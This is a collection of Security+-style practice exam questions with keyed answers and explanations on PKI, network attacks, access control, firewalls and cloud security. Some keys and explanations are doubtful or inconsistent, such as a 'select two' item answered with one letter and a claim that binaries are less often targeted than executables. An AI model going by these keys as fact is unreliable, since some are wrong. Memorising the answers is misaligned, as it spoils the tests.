D. A self-signed certificate is one that the website creator has created and signed. Because the certificate did not come from a known third-party security company, the web browser does not recognize it in this scenario. See the section titled "Public Key Infrastructure" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: A weak certificate cipher is usually recognized, but the web browser will display a warning of some sort or perhaps block initial attempts to access the web page. Key escrow is when keys are held for third-party organizations in case they need access to data.

A malicious computer is sending data frames with false hardware addresses to a switch. What is happening? DNS poisoning pWWN spoofing MAC spoofing ARP poisoning

D. ARP poisoning is an attack that exploits Ethernet networks—spoofed frames of data will contain false MAC addresses, ultimately sending false hardware address updates to a switch. See the section titled "Malicious Attacks" in Chapter 7, "Networking Protocols and Threats," for more information. Incorrect answers: DNS poisoning is the unauthorized modification of name resolution information. pWWN spoofing is a type of spoof attack carried out on SANs. MAC spoofing is a technique for changing the MAC address of a network adapter.

What needs to be configured to offer remote access to a network? Tokens Biometrics Supplicants ACLs

D. Access control lists (ACLs) need to be configured properly for users to gain remote access through a firewall/router and proceed to the main network. See the section titled "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: Tokens are used in authentication schemes (often local) but are usually generated with little configuration. Biometrics is the authentication of individuals through physical characteristics. Supplicants (authentication agents) are usually loaded on computers in an 802.1X NAC network, which is usually local and with little configuration.

Which of the following is a removable device that can be used to encrypt in a high-availability, clustered environment? Biometrics Cloud computer TPM HSM

D. An HSM (hardware security module) is a device used to manage digital keys and provide authentication. It can be connected to a computer, a server, or a particular server in a clustered environment. See the section titled "Securing Computer Hardware and Peripherals" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: Biometrics is the science of authenticating individuals by their physical traits. A cloud computer is a computer that resides on the Internet and is run by a third-party service provider that offers various computing services to individual users and small to midsized companies. A TPM is a trusted platform module that is similar to an HSM but is internal to the computer, perhaps as a chip on the motherboard.

Randy needs an external add-on solution that can provide encryption and integrate with his existing database server. Which of the following would meet his needs? TPM FDE CAC HSM

D. An HSM (hardware security module) provides encryption and can be an external device that can integrate with an existing server. See the section titled "Securing Computer Hardware and Peripherals" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: A TPM (trusted platform module) is an encrypting chip that resides on a motherboard. FDE stands for full disk encryption, which can be implemented with a TPM. CAC stands for Common Access Card, a smart ID card used by the Department of Defense (DoD).

Which of the following types of viruses hides its code to mask itself? A. Stealth virusB. Polymorphic virusC. WormD. Armored virus

D. An armored virus attempts to make disassembly difficult for an an- tivirus software program. It thwarts attempts at code examination. Stealth viruses attempt to avoid detection by antivirus software altogether. Polymor- phic viruses change every time they run. Worms are not viruses.

You have disabled all unnecessary services on a domain controller. What is this an example of? Secure code review Baselining Patch management strategy Application hardening

D. Application hardening is the securing of an application, disabling of unnecessary services, disabling unused accounts, removal of unnecessary applications, and so on. See the section titled "Hardening Operating Systems" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: Secure code review is the analysis of code to make sure it cannot be corrupted; this is done through input validation, checking for unmanaged code, checking for sensitive data, and so on. Baselining is the process of measuring changes in a system. Patch management strategy is the entire four-step process involved when adding patches to a system.

A programmer wants to prevent cross-site scripting. Which of the following should the programmer implement? Validation of input to remove bit code Validation of input to remove shell scripts Validation of input to remove batch files Validation of input to remove hypertext

D. Cross-site scripting (XSS) is a vulnerability to web applications. For example, a malicious attacker might attempt to inject hypertext into a standard text-based web form. See the section titled "Secure Programming" in Chapter 5, "Application Security," for more information. Incorrect answers: Shell scripts, batch files, and Java bit code are not associated with XSS attacks.

Michael has just completed monitoring and analyzing a web server. Which of the following indicates that the server might have been compromised? A. The web server is sending hundreds of UDP packets.B. The web server has a dozen connections to inbound port 80.C. The web server has a dozen connections to inbound port 443.D. The web server is showing a drop in CPU speed and hard disk speed.

D. D. If the web server is showing a drop in processor and hard disk speed, it might have been compromised. Further analysis and comparison to a pre- existing baseline would be necessary. All the other answers are common for a web server.

Which of the following is a common symptom of spyware? A. Infected filesB. Computer shuts downC. Applications freezeD. Pop-up windows

D. D. Pop-up windows are common to spyware. The rest of the answers are more common symptoms of viruses.

Your organization uses a type of cryptography that provides good security but uses smaller key sizes and utilizes logarithms that are calculated against a finite field. Which type of cryptography does your organization use? Quantum cryptography Diffie-Hellman RSA Elliptic curve

D. Elliptic curve cryptography (ECC) is based on the difficulty of solving certain math problems and is calculated against a finite field. It uses smaller key sizes than most other encryption methods. See the section titled "Encryption Algorithms" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: Quantum cryptography is a newer type of encryption method based on quantum mechanics

A co-worker's laptop has been compromised. What is the best way to mitigate data loss? Common Access Card Strong password Biometric authentication Full disk encryption

D. Full disk encryption is the best way (listed) to mitigate data loss in the case of a stolen or otherwise compromised laptop because it will be difficult to decrypt the data on the laptop. See the section titled "Securing Computer Hardware and Peripherals" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: A Common Access Card is a smart card/photo ID used by the DoD. Strong passwords are a good idea on portable devices but can be cracked or circumvented more easily than a full disk encryption solution. Biometric authentication can also be cracked given enough time.

You have received several reports from users of corrupted data. You patched the affected systems but are still getting reports of corrupted data. Which of the following methods should you use to help identify the problem? Data integrity check Penetration testing Hardware baseline review Vulnerability scan

D. If the data is becoming corrupted more than once even after an update to the affected systems, you should perform a vulnerability scan to find out what the possible threats and vulnerabilities are to those systems. See the section titled "Conducting Risk Assessments" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: A data integrity check would simply tell you that the data has been corrupted and, therefore, that integrity is not intact. Penetration testing determines whether a system can be compromised by exploiting a particular threat. A hardware baseline review will tell you how your hardware is performing and how secure it is compared to the last baseline. Baselines are examples of vulnerability assessments, but in this case you need a software-based vulnerability assessment.

Your organization has a PKI. Data loss is unacceptable. What method should you implement? CR Web of trust CA Key escrow

D. Key escrow should be implemented if data loss is unacceptable. This is when keys are held in case another party needs access to secured communications. See the section titled "Public Key Infrastructure" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: The CRL is the certificate revocation list. A web of trust is a decentralized model used for the management of keys. A CA (certificate authority) is a centralized model used for the management of keys.

Which of the following concepts best describes the mandatory access control model? Bell-LaPadula Clark-Wilson Biba Lattice

D. Mandatory access control (MAC) has two common implementations: rule-based access control and lattice-based access control. Lattice-based access control is used for more complex determinations of object access by subjects; this is done with advanced mathematics that creates sets of objects and subjects and defines how the two interact.

You and your security team have established a security awareness program to help educate the employees in your organization. Which of the following would give you the best indication of the success of the program? (select two) Procedures Policies Standards Metrics

D. Metrics are actual data that enables an administrator to see the performance of a particular training program or technology. In this scenario, a good way to obtain metrics would be to test the employees after training. Collect the information by computer to see how well the employees performed as a whole, and therefore how well they know the content of the training. The concept can be applied to technologies such as servers and networking connections as well. See the section "User Education" in Chapter 17, "Social Engineering, User Education, and Facilities Security," for more information. Incorrect answers: Policies and procedures are written to increase the level of security and reduce risk to an organization, but do not indicate whether they are successful or not. The same holds true for standards. Standards and protocols are used to provide a commonality between employees when they work on their computers. It could be as simple as logging in before starting work, or as complex as using a cipher suite such as TLS (including RSA, AES, and SHA-1) when connecting to the organization's website. But you would have to test those protocols and connections to make sure they work. Multiple tests and baselining could ultimately provide metrics.

You ran a penetration test against your two database servers and found out that each of them could be compromised with the default database user account and password. Which of the following did you forget to do to your database servers? OS hardening Patch management Virtualization Application hardening

D. Part of application hardening includes renaming (or disabling) default accounts and setting complex passwords. If these steps are not taken, compromising the application becomes very easy for attackers. See the section titled "Hardening Operating Systems" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: OS hardening is not correct in this instance because it is the database that can be compromised using the default database username/password. Databases are considered to be applications, not operating systems. Patch management won't affect the default user account. The account has to be secured manually. Virtualization of operating systems doesn't come into play here, although it could help to have backup virtual images made in the case that the database server is compromised.

Which of the following methods can possibly identify when an unauthorized access has occurred? Session lock mechanism Session termination mechanism Two-factor authentication Previous logon notification

D. Previous logon notification notifies the user and possibly the administrator of when the last-known good logon occurred. If a user knows that they did not log on at that time, it is a good indicator that unauthorized access occurred. See the section "Rights, Permissions, and Policies" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: Session lock mechanisms can be implemented on several different types of operating systems. For example, in Windows a policy can be created to lock the computer after a specific timeout. Sessions can also be terminated automatically via systems such as an FTP server after a specific timeout. Two-factor authentication is a type of multifactor authentication in which two types of identification are necessary to gain access to a network.

MD5 can be manipulated by creating two identical hashes using two different messages, resulting in a collision. This is difficult (if impossible) to do with SHA-256. Why is this? SHA-256 has greater collision strength than MD5. MD5 has greater collision resistance than SHA-256. MD5 has greater collision strength than SHA-256. SHA-256 has greater collision resistance than MD5.

D. SHA-256 has greater collision resistance than MD5 because it employs a 256-bit hash, whereas MD5 employs a 128-bit hash. See the section "Hashing Basics" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: MD5 has weaker collision resistance than SHA-256. We aren't concerned with collision "strength" so to speak, but are more concerned with the cryptographic hash's resistance to collisions.

Your boss asks you to replace the current RADIUS authentication system with a more secure system. Your current RADIUS solution supports EAP, and your new solution should do the same. Which of the following is the best option and would offer the easiest transition? CHAP SAML Kerberos Diameter

D. The Diameter protocol is, like RADIUS, another AAA protocol, but is a more evolved protocol and utilizes more reliable transport mechanisms such as TCP and Stream Control Transmission Protocol (SCTP), as opposed to UDP. Like RADIUS, many Diameter applications allow for the use of the Extensible Authentication Protocol (EAP). See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: CHAP (Challenge-Handshake Authentication Protocol) is an authentication scheme used to authenticate a user or host. Whereas RADIUS and Diameter are authentication systems, they both make use of authentication schemes such as PAP, CHAP, and EAP. SAML (Security Assertion Markup Language) is an XML-based open standard for exchanging authentication and authorization data between two parties. It helps alleviate problems with single sign-on (SSO). Kerberos is another type of authentication system, but is used more commonly in localized environments; it is not meant as a replacement for RADIUS.

Ann has been asked by her boss to periodically ensure that a domain controller/DNS server maintains the proper security configuration. Which of the following should she review? Firewall logs NIPS logs WINS configuration User rights

D. The best answer is user rights. A domain controller is in charge of user accounts and the permissions (rights) associated with those users.

One of the users in your organization informs you that her 802.11n network adapter is connecting and disconnecting to and from an access point that was recently installed. The user has Bluetooth enabled on the laptop. A neighboring company had its wireless network compromised last week. Which of the following is the most likely cause of the disconnections? The attacker that compromised the neighboring company is running a war-driving attack. A Bluetooth device is interfering with the user's laptop. An attacker in your organization is attempting a bluejacking attack. The new access point was not properly configured and is interfering with another access point.

D. The most likely cause is that the new access point the laptop is connecting to was not configured properly. Perhaps the antennas were not set to a high enough power level, or the placement of the AP is not close enough to the laptop. See the section titled "Securing Wireless Networks" in Chapter 9, "Securing Network Media and Devices," for more information. Incorrect answers: Less likely is the possibility that an attacker is running a war-driving attack against your network. It is possible that a Bluetooth device is causing interference (because both share the 2.4-GHz spectrum), but it is also less likely. A bluejacking attack (if successful) would probably not affect the ability of an 802.11n network adapter to connect with an access point.

You are tasked with implementing an access point to gain more wireless coverage. What should you look at first? SSID Radio frequency Encryption type Power levels

D. The power levels will dictate how far an access point can transmit its signal. For more coverage, increase the power levels, but be careful not to go beyond your organization's work area, or other neighboring entities might try to compromise your network.

A visitor plugs her laptop into the network in the conference room and attempts to start a presentation that requires Internet access. The user gets a warning on the screen saying that her antivirus software is not up to date. As a result, the visitor is unable to access the Internet. What is the most likely cause of this? The security posture on the network is disabled, and remediation must take place before the user can access the Internet. The IDS blocked access to the network. The IPS prevented access to the network. The security posture on the network is enabled, and remediation must take place before the user can access the Internet.

D. The security posture can be defined as the risk level to which a system is exposed. If enabled, a system will need to meet particular security requirements. In this case, the user cannot access the Internet with her laptop until the antivirus software is updated (the remediation). See the section titled "Monitoring Methodologies" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: If the security posture were disabled, the user would not need to update her system. An IDS will not block access to the network. Instead, an IDS will detect malicious activity on the network. An IPS is not designed to prevent internal users from accessing the network; it is designed to prevent malicious activity on the network.

A thumb drive has been used to compromise systems and enable unauthorized access. What kind of malware was most likely installed to the thumb drive? Bot Logic bomb Virus Trojan

D. Trojans are used to access a system without authorization. They can be installed to USB flash drives, can be remote access programs, or could be unwittingly stumbled upon when accessing disreputable websites. The key phrase here is "unauthorized access"; that is what the Trojan is trying to do. See the section titled "Malicious Software Types" in Chapter 2, "Computer Systems Security Part I," for more information. Incorrect answers: A bot is a computer that performs actions without the user's consent and is often controlled by a remote master computer. Although the bot doesn't enable unauthorized access, a Trojan might carry a bot program as part of its payload. Logic bombs are generally a method of transferring malware and are meant to initiate a malicious function at a specific time. Viruses infect a computer but are not used for unauthorized access.

Tara has written an application and is ready to go through the hardening process. Which of the following could be considered a hardening process of the SDLC? Disabling unnecessary services Application patching management schedule Disabling unnecessary accounts Secure coding concepts

Secure coding concepts such as input validation will help to harden an application within the systems development life cycle (SDLC). See the section titled "Secure Programming" in Chapter 5, "Application Security," for more information. Incorrect answers: Although disabling unnecessary services and accounts and patching the application are important, these could all be considered application or server hardening, not hardening within the SDLC.

Which of the following is used to validate whether trust is in place and accurate by retuning responses of "good," "unknown," or "revoked"? OCSP PKI CRL RA

A

Which one of the following attacks misuses the Transmission Control Protocol three-way handshake process in an attempt to overload network servers so that authorized users are denied access to network resources? SYN attack Man-in-the-middle attack Teardrop attack Smurf attack

A

On Monday, all employees of your organization report that they cannot connect to the corporate wireless network, which uses 802.1X with PEAP. A technician verifies that no configuration changes were made to the wireless network and its supporting infrastructure, and that there are no outages. Which of the following is the most likely cause of the problem? The Remote Authentication Dial-In User Service certificate has expired. The DNS server is overwhelmed with connections and is unable to respond to queries. There have been too many incorrect authentication attempts and this caused users to be temporarily disabled. The company IDS detected a wireless attack and disabled the wireless network.

A. 802.1X secure network access can be used to connect to wireless networks. It can use EAP, CHAP, or PEAP authentication. It can also utilize centralized authentication such as RADIUS. Though the scenario does not say so specifically, you can assume an 802.1X/PEAP/RADIUS configuration. If the RADIUS certificate expires, none of the wireless users would be able to connect. Incorrect answers: The DNS server is a separate service altogether. If it was overwhelmed (perhaps by a DDoS attack), then DNS queries would fail, but those queries would be to items on the domain, or websites, and so on. It should not affect the wireless network. Too many incorrect authentication attempts could cause some users to be disabled, but most likely this will be a temporary loss of service. In the scenario, all employees report no service to the wireless network. The scenario also states the technician verified that there were no outages, so the IDS should not have disabled the wireless network.

Which of the following security applications cannot proactively detect computer anomalies? NIDS HIPS Antivirus software Personal software firewall

A. A NIDS, or network intrusion detection system, cannot proactively detect computer anomalies. It is deployed to the entire network and looks for a network intrusion, not intrusions to individual computers. See the section "NIDS Versus NIPS" in Chapter 8, "Network Perimeter Security," for more information. Incorrect answers: A HIPS (host-based intrusion prevention system), antivirus software, and personal software firewalls can all be loaded on an individual computer and can be updated as well. These can proactively detect computer anomalies.

The IT director tasks you to set up a backup plan to ensure that your organization can be back up and running within hours if a disaster occurs. Which of the following should you implement? Hot site Redundant servers Cold site Tape backup

A. A hot site is a backup site that can be running within hours, perhaps immediately. It contains computers, phones, servers, and a complete backup of the data so that employees can begin working immediately when they enter the hot-site building. This is sometimes referred to as a hot-backup site.

E-mail servers can be maliciously exploited in many ways, for example, spoofing e-mail messages. Which of the following is a common component that attackers would use to spoof e-mails? Open relay Web proxy Session hijacking Logic bomb

A. An open relay is an invitation for attackers to send out spoofed e-mails and spam. These relays should be closed on SMTP servers so that only authenticated users can gain access to them. See the section "Preventing and Troubleshooting Malware" in Chapter 2, "Computer Systems Security Part I," for more information. Incorrect answers: Web proxies are go-betweens for clients on the network and the web servers that they want to connect to. The web proxy stores web page information so that the organization can save Internet bandwidth and the clients can get their information faster. Session hijacking is the exploitation of a computer session in an attempt to gain unauthorized access to data services or other resources on the computer. Logic bombs are code that has in some way been inserted into software, initiating malicious functions when specific criteria are met.

Which of the following is the most complicated centralized key management scheme? Asymmetric Symmetric Whole disk encryption Steganography

A. Asymmetric systems such as PKI (public key infrastructure) have a complicated centralized key management scheme. A system such as PKI creates an asymmetric key pair that includes a public key and a private key. The private key is kept secret, whereas the public key can be distributed. See the section "Cryptography Concepts" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: Symmetric systems use two keys, but they are the same type of key, usually identical, thus the name symmetric. Whole disk encryption schemes such as BitLocker use trusted platform modules (TPMs) that store the symmetric encrypted keys; these keys are often based on the Advanced Encryption Standard (AES). Steganography is the science of hiding messages within files and doesn't use keys.

Your company has a mix of on-premises infrastructure and cloud-provider infrastructure and needs to extend the reach of its security policies beyond the internal infrastructure. Which of the following would be the BEST solution for the company to consider? CASB SaaS PaaS MaaS

A. If there is a mix of on-premises infrastructure and cloud-provider infrastructure, a company might consider a cloud access security broker (CASB). A CASB is a software tool or service that acts as the gatekeeper between the two, allowing the company to extend the reach of its security policies beyond its internal infrastructure. See the section "Cloud Security and Server Defense" in Chapter 6, "Network Design Elements," for more information. Incorrect answers: Software as a service (SaaS) is when users access applications over the Internet that are provided by a third party. The applications need not be installed on the local computer. Platform as a service (PaaS) is a service that provides various software solutions to organizations, especially the ability to develop applications in a virtual environment without the cost or administration of a physical platform. PaaS is used for easy-to-configure operating systems and on-demand computing. Monitoring as a service (MaaS) is a framework that facilitates the deployment of monitoring within the cloud in a continuous fashion.

Which of the following network authentication protocols uses symmetric key cryptography, stores a shared key for each network resource, and uses a Key Distribution Center (KDC)? Kerberos RADIUS TACACS+ PKI

A. Kerberos is an authentication protocol that enables computers to prove their identity to each other in a secure manner; it is quite often used in a client/server environment such as a Microsoft domain. Kerberos is the only answer listed that uses a Key Distribution Center. It uses two-way authentication, otherwise known as mutual authentication.

You have been commissioned by a customer to implement a network access control model that limits remote users' network usage to normal business hours only. You create one policy that applies to all the remote users. What access control model are you implementing? Role-based access control Mandatory access control Discretionary access control Rule-based access control

A. Role-based access control (RBAC) works with sets of permissions; each set of permissions constitutes a role. Users are assigned to roles to gain access to resources. Examples of user groups that are assigned to roles include remote users, extranet users, guests, and so on. In this question, the remote users are the group that has been assigned a role that enables them to access the network only during normal business hours. See the section "Access Control Models Defined" in Chapter 11, "Access Control Methods and Models," for more information. Role-based access control should not be confused with rule-based access control, which is a type of mandatory access control (MAC). MAC is an access control policy determined by a computer system and not by a user or owner. Discretionary access control (DAC) is generally determined by the owner of a resource.

As a security administrator, you must be constantly vigilant and always be aware of the security posture of your systems. Which of the following supports this goal? Establishing baseline reporting Disabling unnecessary services Training staff on security policies Installing anti-malware applications

A. The key words of the question are "security posture." One of the best methods of monitoring the security posture of your systems is establishing baseline reporting. Baselining is the process of measuring changes in networking, hardware, software, and so on. Creating a baseline consists of selecting something to measure and measuring it consistently for a period of time. It is this baselining (and automated reporting with baselining tools such as Performance Monitor or Wireshark) that allows you to be vigilant and watch over your network carefully in real time. See the section "Monitoring Methodologies" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: Disabling unnecessary services is an important security concept, but this refers to hardening the system, and reducing the attack surface. Training staff on security policies is educating the user and is extremely important when attempting to reduce the consequences of successful social engineering attacks. Installing anti-malware applications also hardens the system, and secures it in general against viruses, worms, Trojans, and other forms of malware.

You are the network security administrator for your organization. You are in charge of deploying 50 new computers on the network. Which of the following should be completed first? Apply a baseline configuration Install operating system updates Install the latest spyware Install a spreadsheet program

A. When installing 50 new computers (or any number of computers) on a network, you should first apply the baseline configuration from information and tests that you have previously collected. This will ensure that all computers comply with the same configuration. See the section "Hardening Operating Systems" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: After applying the baseline configuration, you would install the latest operating system updates, followed by antivirus and anti-spyware programs, and finally applications such as word processors and spreadsheet.

You want to secure data passing between two points on an IP network. What is the best method to protect from all but the most sophisticated APTs? Transport encryption Key escrow Block ciphers Stream ciphers

A. When securing data that passes between two points on an IP network, you need some kind of transport layer communications encryption protocol. Examples include Transport Layer Security (TLS) and Secure Sockets Layer (SSL). Protocols such as these operate on layer 4 of the OSI model; they encrypt the transmissions between IP-based computers, protecting the session data from eavesdroppers, and are thus known as transport layer encryption protocols. They make use of X.509 certificates and a public key infrastructure (PKI). These protocols can utilize block ciphers (for instance, Advanced Encryption Standard [AES]) or stream ciphers (for example, RC4), but more commonly use the former. By the way, APT stands for advanced persistent threat, a group of continuous hacking processes often performed by multiple attackers. APTs are carried out by knowledgeable groups of people using very sophisticated attacks; often they reside in another country. See the section "Security Protocols" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: Key escrow is when decryption keys are held in escrow (placed in the custody of a third party), in the case that they are needed to gain access to data. They are common in PKI systems. This is a concept of where keys are stored, but not a method of encrypting data transmissions between two hosts. The answers "block ciphers" and "stream ciphers" are not specific enough. You can use either as part of an overall solution to secure data passing between two points on an IP network, but more often than not you will encounter SSL certificates that make use of RSA (for the key exchange) and AES (the actual cipher used for the transfer of session data).

There is an important upcoming patch to be released. You are required to test the installation of the patch a dozen times before the patch is distributed to the public. What should you perform to test the patching process quickly and often? Create a virtualized sandbox and utilize snapshots Create an image of a patched PC and replicate it to the servers Create an incremental backup of an unpatched PC Create a full disk image to restore after each installation

A. You should create a virtualized sandbox - a place where you can work with many virtualized images and test them frequently. By utilizing snapshots, you are taking limited images of the systems at a specific point, most likely before and after the patch installation. The snapshot is a set of information at a particular point in time, and not necessarily an entire image. Incorrect answers: Creating a single image of a patched PC is not enough. Good patch management requires that the security administrator do thorough testing; in the scenario you are required to test the patch a dozen times. Incremental backups are used as a part of an efficient backup plan that usually includes incremental and full backups. But this - and the fact that the PC is unpatched - does not help a security administrator to test the patching process quickly and often. A full disk image after each patch installation could be very time consuming. Instead, snapshots are the better option.

Which of the following attacks involve intercepting a session and modifying network packets? Select 2 answers TCP/IP hijacking Denial of service Man-in-the-middle attack DNS poisoning Null session

AC. TCP/IP hijacking and man-in-the-middle attacks are both examples of attacks that involve intercepting a user's session and modifying network packets. TCP/IP hijacking is when a hacker takes over a TCP session between two computers without the need of a cookie. Man-in-the-middle attacks intercept all data between the client and the server; if successful all communications now go through the MITM attacking computer. These are both types of hijacking; other types of hijacking include session theft and blind hijacking.

Your network is a Windows domain controlled by a Windows Server domain controller. Your goal is to configure user access to file folders shared to the network. In your organization, directory access is dependent upon a user's role in the organization. You need to keep to a minimum the administrative overhead needed to manage access security. You need to be able to quickly modify a user's permissions if that user is assigned to a different role. A user can be assigned to more than one role within the organization. What solutions should you implement? (Select the two best answers.) Create security groups and assign access permissions based on organizational roles Place users in OUs based on organizational roles Create an OU for each organizational role and link GPOs to each OU Place users' computers in OUs based on user organizational roles Assign access permission explicitly by user account

AC. The first thing you should do as a network administrator is create organizational units (OUs) for each of the departments in your organization; this helps to categorize and classify where users will ultimately end up. Each OU will be considered a different role. Next on the list is creating Group Policy objects (GPOs), modifying the security policies, and applying those to each individual OU. Then, you should create the users and place them in their correct OUs according to the department that they will be working in and the role that they will play. Finally, you should create security groups, add users to the appropriate security group or groups, and apply access permissions to the groups, instead of the users, to save time and keep administrative overhead to a minimum. Incorrect answers: Placing the user's computer in an OU could cause issues when it comes time to move a user account to another OU; the computer account would need to be moved with it. Access permissions should not be assigned solely by the individual user account; this would increase administrative overhead by a great deal.

You have been tasked with sending a decommissioned SSL certificate server's hard drives to be destroyed by a third-party company. What should you implement before sending the drives out? (Select the two best answers.) Disk wiping Data retention policies Removable media encryption Full disk encryption Disk hashing

AD. You don't want anyone else to get a hold of your SSL certificates, even if they are expired. The best solution in the scenario is to either destroy the drives yourself or store them in a secure location for a period of time. However, if you are sending them to a third party for destruction, the best option would be to fully wipe the drives; sanitize them with powerful software, and strong methods such as the Gutmann method. Barring that, you would want to consider full disk encryption (FDE) that utilizes AES or another powerful cipher. This way, the third party, and anyone else between you and the third party, will not be able to learn the RSA keys that the certificates are based on. See the section "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: A data retention policy states how long data must be stored by an organization. If the drives are going to another company, then this policy is moot in this case. The server's hard drives that are referred to in the question are most likely internal drives, so removable media encryption (for things such as USB flash drives) has no bearing here. Disk hashing is not necessary. You are not interested in the data anymore, so there is no reason to hash it.

What are the best ways for a web programmer to prevent website application code from being vulnerable to XSRF attacks? (Select the two best answers.) Validate input on the client and the server side Ensure HTML tags are enclosed within angle brackets Permit URL redirection Restrict the use of special characters in form fields Use a web proxy to pass website requests between the user and the application

AD. Input validation is extremely important when it comes to website attacks such as XSRF (cross-site request forgery) and cross-site scripting (XSS) attacks. Forms and other documents should be validated on the client side and the server side (if at all possible). Special characters should be restricted and sanitized within form fields and URLs. This is all part of secure coding.

You have been tasked with blocking DNS requests and zone transfers coming from outside IP addresses. You analyze your organization's firewall and note that it implements an implicit allow and currently has the following ACL configured for the external interface: permit TCP any any 80 permit TCP any any 443 Which of the following rules would accomplish your goal? (Select the two best answers.) Change the implicit rule to an implicit deny Remove the current ACL Add the following ACL at the top of the current ACL: deny TCP any any 53 Add the following ACL at the bottom of the current ACL: deny ICMP any any 53 Apply the current ACL to all interfaces of the firewall Add the following ACL at the bottom of the current ACL: deny IP any any 53

AF. First of all, a firewall should not be set with an implicit allow by default. That would allow just about any kind of traffic through the firewall. Plus, it would make the already configured ACL unnecessary. So, the firewall should be changed to an implicit deny for all connections. That is the default settings for firewalls and it disallows all traffic coming from the Internet through the inbound interface (unless otherwise stated with an ACL). Second, you would add the ACL deny IP any any 53 at the bottom of the current ACL. This will deny any DNS traffic (because DNS uses port 53) including DNS requests and zone transfers. It does this for any type of IP connection (including TCP and UDP) and for all IP addresses on the local and remote ends. Incorrect answers: Removing the current ACL would do nothing because the firewall is currently configured with an implicit allow. However, if you changed that default rule to an implicit deny and removed the ACL, Internet users would no longer be able to connect to the web server (which uses ports 80 and 443). That doesn't solve your problem; in fact, it creates another one. It doesn't really matter where you place the new ACL to block DNS requests - top, bottom, doesn't make a difference because when you are finished, the firewall will have an implicit deny, and then two separate ACLs that pretty much work independently of each other. However, you would normally place the ACLs in order, and this would mean placing the new ACL below the first. The key with the other two possible ACLs in the answers is that they are not blocking enough traffic. One shows TCP, which is not enough; you need to block TCP and UDP - this is done by simply stating IP. ICMP is not correct, because that deals with layer 3 testing, such as the ping utility.

In this scenario, your organization and a sister organization use multiple certificate authorities (CAs). Which component of PKI is necessary for one CA to know whether to accept or reject certificates from another CA? CRL Key escrow RA Recovery agent

An RA is a registration authority used to verify requests for certificates from a certificate authority or multiple certificate authorities. See the section "Public Key Infrastructure" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: A CRL is a certificate revocation list; if for some reason a certificate cannot be verified by any parties involved and the issuer of the certificate confirms this, the issuer needs to revoke the certificate. The certificate is placed in the CRL that is published. Key escrow is when certificates are held if the third parties need them in the future. Recovery agents recover certificates that were corrupted or lost.

(messer) Which of these access control models is most associated with Windows Groups? Rule-based access control Role-based access control File system security Mandatory access control Attribute-based access control

B

For a user to obtain a certificate from a certificate authority, the user must present two items. The first is proof of identity. What is the second? Password Public key Private key Authentication

B

Your network has a DHCP server, AAA server, LDAP server, and e-mail server. Instead of authenticating wireless connections locally at the WAP, you want to utilize RADIUS for the authentication process. When you configure the WAP's authentication screen, what server should you point to, and which port should you use? The DHCP server and port 67 The AAA server and port 1812 The LDAP server and port 389 The e-mail server and port 143

B

Your organization has decided to move large sets of sensitive data to a SaaS cloud provider in order to limit storage and infrastructure costs. Your CIO requires that both the cloud provider and your organization have a clear understanding of the security controls that will be implemented to protect the sensitive data. What kind of agreement is this? SLA ISA MoU BPA

B. An ISA is an interconnection security agreement. It is an agreement that is established between two (or more) organizations that own and operate connected IT systems and data sets. Its purpose is to specifically document the technical and security requirements of the interconnection between the organizations. This is the type of agreement you need in this scenario because the data is sensitive and the CIO requires that there is a clear understanding of security controls to be implemented and agreed upon. See the section "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: An SLA (service level agreement) is a contract between a service provider and a customer that specifies the nature of the service to be provided and the level of service that the provider will offer to the customer. It can be a very basic agreement, or it could also state the technical and performance parameters, but it will probably not include any specific security controls. An MoU is not an agreement at all, but a memorandum of understanding between two organizations or government agencies. It does not specify any security controls either. A BPA (business partners agreement) is a type of contract that can establish the profits each partner will get, what responsibilities each partner will have, and exit strategies for partners. Note that you might see the acronym BPA used for other things as well in the business and IT worlds.

You are a security administrator for a midsized company that uses several applications on its client computers. After the installation of a specialized program on one computer, a software application executed an online activation process. Then, a few months later, the computer experienced a hardware failure. A backup image of the operating system was restored on a newer revision of the same brand and model computer. After that restoration, the specialized program no longer works. Which of the following is the most likely cause of the problem? The restored image backup was encrypted with the wrong key. The hash key summary of the hardware and the specialized program no longer match. The specialized program is no longer able to perform remote attestation due to blocked ports. The binary files used by the specialized program have been modified by malware.

B. Some software activations are based on a hardware key, or a hardware key and a software key that are compared. The key is normally a hash value (computed with either MD5 or SHA-256, for instance), and if the hash values don't match, then the specialized program won't be able to execute the online activation process, which is required because the image was restored to the new computer (with a new and different key). This of course is the most likely cause, but not the only possible reason for why the specialized program stopped functioning. See the section "Hashing Basics" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: If the image file to be restored was encrypted with the wrong key, then you wouldn't be able to complete the restoration, and the computer would not function. In trusted computing, remote attestation is when a client computer authenticates its hardware and software configuration to a remote server with the goal being to determine the level of trust - often using a PKI. Remote attestation might indeed be failing, but it is less likely being caused by blocked ports. The software configuration of the affected computer should not have changed, even after the restoration. Plus, the scenario doesn't mention any network changes, so the configuration of ports, ACLs, and so on should be the same. The least likely answer is that the binary files of the specialized program have been modified by malware. Malware can target binary files, but it is less common compared to other types of files such as executables. Many application developers will protect their binary files with transport layer security encryption, making them difficult (if not impossible) to modify.

You want to prevent any intrusions to a single computer. What is the best solution? VPN concentrator Host-based firewall Host-based intrusion detection Network firewall

